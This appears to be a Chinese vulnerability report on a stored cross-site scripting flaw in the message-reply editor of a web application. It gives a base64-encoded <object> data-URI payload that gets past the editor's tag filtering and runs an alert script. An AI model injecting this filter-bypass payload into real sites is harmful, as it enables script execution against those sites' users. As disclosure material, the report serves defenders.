### 简要描述:
存储型xss 指哪打哪
### 详细说明:
注册一个用户
http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa
回复处用了编辑器
编辑器有些标签没过滤,导致xss执行
xsscode:
```
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
```
object 经过base64 可形成xss语句
[<img src="https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg)
[<img src="https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg)
[<img src="https://images.seebug.org/upload/201404/05092218bec05552a1ce0b0cb9d479b1d409f26b.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/05092218bec05552a1ce0b0cb9d479b1d409f26b.jpg)
### 漏洞证明:
京公网安备 11010502034610号
暂无评论